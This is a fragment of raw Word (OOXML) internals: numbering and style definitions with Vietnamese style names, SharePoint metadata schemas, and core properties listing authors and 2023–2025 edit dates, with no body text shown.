    <w:tmpl w:val="2BC0B2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F90370"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="181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978B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D3688B6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0A00A2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C369BDC"/>
    <w:lvl w:ilvl="0" w:tplc="3B7EC2FA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2EE678C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7822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CF1912"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D562B91A"/>
    <w:lvl w:ilvl="0" w:tplc="C1E6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5C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D682F462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5097649B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3E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08A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96B6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713BE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD6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921B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D1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85396"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D73496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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="602115F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="469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13ED3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C09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415D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97C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6654B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B002B77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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65FA66E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="756C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254D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAE827A4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6EA36AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F98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98444E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4510F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9FF6D48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46A0BEA4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2316E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9F8B2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9003FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F6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D504A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEA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343AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59E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41340">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="675889917">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1139103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930">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1142650717">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="381560785">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1059474349">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="178086754">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1275014980">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1780250115">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="482966905">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1003361222">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="288511358">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="314996491">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1444688103">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1703940522">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="474224428">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1971782793">
    <w:abstractNumId w:val="12"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1133214577">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1002590398">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1226838097">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="993949487">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="322970491">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="40524329">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="157159189">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1329139291">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1815561594">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1688672904">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="984818422">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="441193570">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="230700683">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="966548538">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1210612208">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="2015762626">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="445974040">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="819922240">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="2024822120">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1929344629">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1971473483">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="22943114">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="252280131">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="436172611">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="617686209">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1562060976">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1003700379">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1548446100">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1795714218">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1962570804">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1583762493">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1627927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EB"/>
    <w:rsid w:val="000002E2"/>
    <w:rsid w:val="00007798"/>
    <w:rsid w:val="0002355F"/>
    <w:rsid w:val="00023563"/>
    <w:rsid w:val="00025E83"/>
    <w:rsid w:val="00026C3E"/>
    <w:rsid w:val="00027BB5"/>
    <w:rsid w:val="00027D06"/>
    <w:rsid w:val="00054B3F"/>
    <w:rsid w:val="00060468"/>
    <w:rsid w:val="00072BE7"/>
    <w:rsid w:val="00073AE4"/>
    <w:rsid w:val="00082CEA"/>
    <w:rsid w:val="000A2020"/>
    <w:rsid w:val="000A682F"/>
    <w:rsid w:val="000B05EA"/>
    <w:rsid w:val="000B22DF"/>
    <w:rsid w:val="000C6BBC"/>
    <w:rsid w:val="000D6C4B"/>
    <w:rsid w:val="000F27AF"/>
    <w:rsid w:val="000F3760"/>
    <w:rsid w:val="000F5C9D"/>
    <w:rsid w:val="001017B7"/>
    <w:rsid w:val="00103F45"/>
    <w:rsid w:val="001142A7"/>
    <w:rsid w:val="00117F27"/>
    <w:rsid w:val="00145AAD"/>
    <w:rsid w:val="001903AD"/>
    <w:rsid w:val="00190ECD"/>
    <w:rsid w:val="001D2F0B"/>
    <w:rsid w:val="001D5004"/>
    <w:rsid w:val="001E49A3"/>
    <w:rsid w:val="001F19ED"/>
    <w:rsid w:val="00221158"/>
    <w:rsid w:val="00230D8A"/>
    <w:rsid w:val="00231C6A"/>
    <w:rsid w:val="00235409"/>
    <w:rsid w:val="002601D3"/>
    <w:rsid w:val="00267F6E"/>
    <w:rsid w:val="002700E5"/>
    <w:rsid w:val="0027676F"/>
    <w:rsid w:val="002839FD"/>
    <w:rsid w:val="002852C4"/>
    <w:rsid w:val="00291008"/>
    <w:rsid w:val="00293184"/>
    <w:rsid w:val="0029579A"/>
    <w:rsid w:val="00296108"/>
    <w:rsid w:val="002B7272"/>
    <w:rsid w:val="002E659C"/>
    <w:rsid w:val="002E7441"/>
    <w:rsid w:val="002E7E94"/>
    <w:rsid w:val="00304C15"/>
    <w:rsid w:val="00334742"/>
    <w:rsid w:val="003426B1"/>
    <w:rsid w:val="0035193C"/>
    <w:rsid w:val="00384520"/>
    <w:rsid w:val="003A6127"/>
    <w:rsid w:val="003B2040"/>
    <w:rsid w:val="003B2C42"/>
    <w:rsid w:val="003E336B"/>
    <w:rsid w:val="003E3459"/>
    <w:rsid w:val="003F0BAC"/>
    <w:rsid w:val="0040093F"/>
    <w:rsid w:val="00422705"/>
    <w:rsid w:val="004235EF"/>
    <w:rsid w:val="004244A5"/>
    <w:rsid w:val="00431FDA"/>
    <w:rsid w:val="00432DA9"/>
    <w:rsid w:val="0043587B"/>
    <w:rsid w:val="00450279"/>
    <w:rsid w:val="00480E0B"/>
    <w:rsid w:val="004813C8"/>
    <w:rsid w:val="004860EB"/>
    <w:rsid w:val="004962DD"/>
    <w:rsid w:val="00497AD5"/>
    <w:rsid w:val="004A71D5"/>
    <w:rsid w:val="004C3EA1"/>
    <w:rsid w:val="004E0BDB"/>
    <w:rsid w:val="004E2EB1"/>
    <w:rsid w:val="004F54BD"/>
    <w:rsid w:val="00510772"/>
    <w:rsid w:val="005116A2"/>
    <w:rsid w:val="005172F5"/>
    <w:rsid w:val="005319A8"/>
    <w:rsid w:val="00560894"/>
    <w:rsid w:val="00572D9D"/>
    <w:rsid w:val="005A0F1C"/>
    <w:rsid w:val="005A6A9E"/>
    <w:rsid w:val="005B3788"/>
    <w:rsid w:val="005B6613"/>
    <w:rsid w:val="005D0A1A"/>
    <w:rsid w:val="005E05EF"/>
    <w:rsid w:val="005F363D"/>
    <w:rsid w:val="005F6515"/>
    <w:rsid w:val="005F78DB"/>
    <w:rsid w:val="00601B80"/>
    <w:rsid w:val="006062B7"/>
    <w:rsid w:val="006267DB"/>
    <w:rsid w:val="00626A21"/>
    <w:rsid w:val="0063665E"/>
    <w:rsid w:val="00671F09"/>
    <w:rsid w:val="00675513"/>
    <w:rsid w:val="006A6F53"/>
    <w:rsid w:val="006A74EF"/>
    <w:rsid w:val="006B27A4"/>
    <w:rsid w:val="006C2F6E"/>
    <w:rsid w:val="006D2CC3"/>
    <w:rsid w:val="006D51F0"/>
    <w:rsid w:val="006F4E8E"/>
    <w:rsid w:val="006F551F"/>
    <w:rsid w:val="006F65BA"/>
    <w:rsid w:val="00727386"/>
    <w:rsid w:val="00730526"/>
    <w:rsid w:val="007723B4"/>
    <w:rsid w:val="00775431"/>
    <w:rsid w:val="00776192"/>
    <w:rsid w:val="007A0266"/>
    <w:rsid w:val="007C00B7"/>
    <w:rsid w:val="007D612C"/>
    <w:rsid w:val="007E2B9B"/>
    <w:rsid w:val="007F267D"/>
    <w:rsid w:val="007F7980"/>
    <w:rsid w:val="00815C32"/>
    <w:rsid w:val="008257D6"/>
    <w:rsid w:val="008315AC"/>
    <w:rsid w:val="00831837"/>
    <w:rsid w:val="008561F6"/>
    <w:rsid w:val="00880C26"/>
    <w:rsid w:val="00881731"/>
    <w:rsid w:val="0088390C"/>
    <w:rsid w:val="008973D5"/>
    <w:rsid w:val="008B7F51"/>
    <w:rsid w:val="008C258A"/>
    <w:rsid w:val="008D56F4"/>
    <w:rsid w:val="008E739A"/>
    <w:rsid w:val="008F20D7"/>
    <w:rsid w:val="008F73B2"/>
    <w:rsid w:val="0090709C"/>
    <w:rsid w:val="009138F3"/>
    <w:rsid w:val="0092078C"/>
    <w:rsid w:val="00920EA8"/>
    <w:rsid w:val="00936B08"/>
    <w:rsid w:val="0093713C"/>
    <w:rsid w:val="009546CA"/>
    <w:rsid w:val="00956900"/>
    <w:rsid w:val="00957A85"/>
    <w:rsid w:val="0097203B"/>
    <w:rsid w:val="00977D3F"/>
    <w:rsid w:val="00987EE7"/>
    <w:rsid w:val="0099160D"/>
    <w:rsid w:val="0099570E"/>
    <w:rsid w:val="009A7E51"/>
    <w:rsid w:val="009B4724"/>
    <w:rsid w:val="009C0DEF"/>
    <w:rsid w:val="009C4CC3"/>
    <w:rsid w:val="009E4D25"/>
    <w:rsid w:val="009E5161"/>
    <w:rsid w:val="00A22766"/>
    <w:rsid w:val="00A333E2"/>
    <w:rsid w:val="00A41889"/>
    <w:rsid w:val="00A418EA"/>
    <w:rsid w:val="00A71861"/>
    <w:rsid w:val="00A82872"/>
    <w:rsid w:val="00A92B7C"/>
    <w:rsid w:val="00AA189A"/>
    <w:rsid w:val="00AD6907"/>
    <w:rsid w:val="00AD7C29"/>
    <w:rsid w:val="00AE3CF6"/>
    <w:rsid w:val="00B032CB"/>
    <w:rsid w:val="00B039AD"/>
    <w:rsid w:val="00B24D8C"/>
    <w:rsid w:val="00B2668F"/>
    <w:rsid w:val="00B323F5"/>
    <w:rsid w:val="00B35C82"/>
    <w:rsid w:val="00B442D3"/>
    <w:rsid w:val="00B47872"/>
    <w:rsid w:val="00B52BF0"/>
    <w:rsid w:val="00B738B9"/>
    <w:rsid w:val="00B919EE"/>
    <w:rsid w:val="00BA7C09"/>
    <w:rsid w:val="00BC7BAC"/>
    <w:rsid w:val="00BE3E70"/>
    <w:rsid w:val="00C12DF8"/>
    <w:rsid w:val="00C14EE9"/>
    <w:rsid w:val="00C15932"/>
    <w:rsid w:val="00C26EF3"/>
    <w:rsid w:val="00C36440"/>
    <w:rsid w:val="00C36A63"/>
    <w:rsid w:val="00C50F40"/>
    <w:rsid w:val="00C5247D"/>
    <w:rsid w:val="00C62E78"/>
    <w:rsid w:val="00C73DDB"/>
    <w:rsid w:val="00C74ED1"/>
    <w:rsid w:val="00C9622A"/>
    <w:rsid w:val="00CA5539"/>
    <w:rsid w:val="00CB04B3"/>
    <w:rsid w:val="00CB5B40"/>
    <w:rsid w:val="00CC039C"/>
    <w:rsid w:val="00D0271F"/>
    <w:rsid w:val="00D073A7"/>
    <w:rsid w:val="00D17D4E"/>
    <w:rsid w:val="00D347F0"/>
    <w:rsid w:val="00D46545"/>
    <w:rsid w:val="00D5513F"/>
    <w:rsid w:val="00D604B5"/>
    <w:rsid w:val="00D67E4E"/>
    <w:rsid w:val="00D72EAD"/>
    <w:rsid w:val="00D758B9"/>
    <w:rsid w:val="00D85E6E"/>
    <w:rsid w:val="00D87EA5"/>
    <w:rsid w:val="00DB108D"/>
    <w:rsid w:val="00DB6454"/>
    <w:rsid w:val="00DB7F34"/>
    <w:rsid w:val="00DC16A0"/>
    <w:rsid w:val="00DC2083"/>
    <w:rsid w:val="00DC7E7A"/>
    <w:rsid w:val="00DE358F"/>
    <w:rsid w:val="00DF4F18"/>
    <w:rsid w:val="00E30C30"/>
    <w:rsid w:val="00E40A48"/>
    <w:rsid w:val="00E41AF3"/>
    <w:rsid w:val="00E45DAC"/>
    <w:rsid w:val="00E737D5"/>
    <w:rsid w:val="00E93B6B"/>
    <w:rsid w:val="00EA78D4"/>
    <w:rsid w:val="00EF31E0"/>
    <w:rsid w:val="00EF7001"/>
    <w:rsid w:val="00F25DE2"/>
    <w:rsid w:val="00F34C67"/>
    <w:rsid w:val="00F40760"/>
    <w:rsid w:val="00F57F0A"/>
    <w:rsid w:val="00F61EE5"/>
    <w:rsid w:val="00F8170C"/>
    <w:rsid w:val="00F86C42"/>
    <w:rsid w:val="00F93091"/>
    <w:rsid w:val="00FD1282"/>
    <w:rsid w:val="00FF0922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ED2C56"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{57F7933D-E3F3-49C7-B814-FE5FE1C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03B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7D4E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="56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01D3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0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EB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004860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EB"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="004860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203B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04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0468"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia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60468"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs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60468"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs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0604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7D4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1D3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i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D3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"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2601D3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Bnghnh">
    <w:name w:val="Bảng hình"/>
    <w:basedOn w:val="Caption"/>
    <w:link w:val="BnghnhChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00DB7F34"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="720" w:right="-32"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BnghnhChar">
    <w:name w:val="Bảng hình Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Bnghnh"/>
    <w:rsid w:val="00DB7F34"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1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F40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3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3B2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6F65BA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:aliases w:val="DANH MỤC HÌNH VẼ"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B442D3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Footnote0">
    <w:name w:val="Footnote"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Footnote"/>
    <w:rsid w:val="006F65BA"/>
    <w:pPr>
      <w:widowControl w:val="0"/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0F5C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F5C9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0F5C9D"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="60" w:line="270" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bodytext2105pt">
    <w:name w:val="Body text (2) + 10.5 pt"/>
    <w:basedOn w:val="Bodytext2"/>
    <w:rsid w:val="000F5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Spacing1pt">
    <w:name w:val="Body text (2) + Spacing 1 pt"/>
    <w:basedOn w:val="Bodytext2"/>
    <w:rsid w:val="000F5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mall Caps"/>
    <w:basedOn w:val="Bodytext2"/>
    <w:rsid w:val="008315A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KC-Chapter">
    <w:name w:val="KC-Chapter"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00572D9D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="480" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="5490"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KC-Fig-Cap">
    <w:name w:val="KC-Fig-Cap"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="KC-Fig-CapChar"/>
    <w:qFormat/>
    <w:rsid w:val="00572D9D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KC-Fig-CapChar">
    <w:name w:val="KC-Fig-Cap Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="KC-Fig-Cap"/>
    <w:rsid w:val="00572D9D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KC-H1">
    <w:name w:val="KC-H1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00572D9D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KC-H2">
    <w:name w:val="KC-H2"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00572D9D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120" w:line="276" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KC-H3">
    <w:name w:val="KC-H3"/>
    <w:basedOn w:val="KC-H2"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00572D9D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572D9D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qFormat/>
    <w:rsid w:val="00572D9D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="37"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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D72EA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72EAD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KC-Tab-CapChar">
    <w:name w:val="KC-Tab-Cap Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="KC-Tab-Cap"/>
    <w:rsid w:val="00B323F5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="28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23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b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stag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gra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ca007-adeb-4e9d-89a9-348e4911bfac">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="44fa3901-960c-4f2d-acb4-715034c73d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6EA8598225DF54298B7517C932DA8F5" ma:contentTypeVersion="18" ma:contentTypeDescription="Tạo tài liệu mới." ma:contentTypeScope="" ma:versionID="c7d2611d39f41d0349458ab157a9aeeb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="2a4ca007-adeb-4e9d-89a9-348e4911bfac" xmlns:ns3="44fa3901-960c-4f2d-acb4-715034c73da9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2400b5eda95cc7d47f38c6cc68f736f0" ns2:_="" ns3:_="">
    <xsd:import namespace="2a4ca007-adeb-4e9d-89a9-348e4911bfac"/>
    <xsd:import namespace="44fa3901-960c-4f2d-acb4-715034c7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a007-adeb-4e9d-89a9-348e4911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hẻ Hình ảnh" ma:readOnly="false" ma:fieldId="{5cf76f15-5ced-4ddc-b409-7134ff3c332f}" ma:taxonomyMulti="true" ma:sspId="4b6a0d8f-a67e-467e-9f79-fec81ee4c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3901-960c-4f2d-acb4-715034c73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253851-2216-44e3-8daf-98c3bdab752c}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="44fa3901-960c-4f2d-acb4-715034c73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371E5-1D96-4643-810F-65A076AD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614EA-FBE7-4240-92C4-A16BCBA37217}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="2a4ca007-adeb-4e9d-89a9-348e4911bfac"/>
    <ds:schemaRef ds:uri="44fa3901-960c-4f2d-acb4-715034c73da9"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{01914D49-5278-4A6B-BA82-DF4447E83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73D26-1AD3-4609-B7E6-CCDBF037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a007-adeb-4e9d-89a9-348e4911bfac"/>
    <ds:schemaRef ds:uri="44fa3901-960c-4f2d-acb4-715034c7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CUONG THINH D19AT02</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyen Minh Hieu D21AT02</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <cp:lastPrinted>2023-12-03T07:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-20T10:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08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A8598225DF54298B7517C932DA8F5</vt:lpwstr>
  </property>
</Properties>
</file>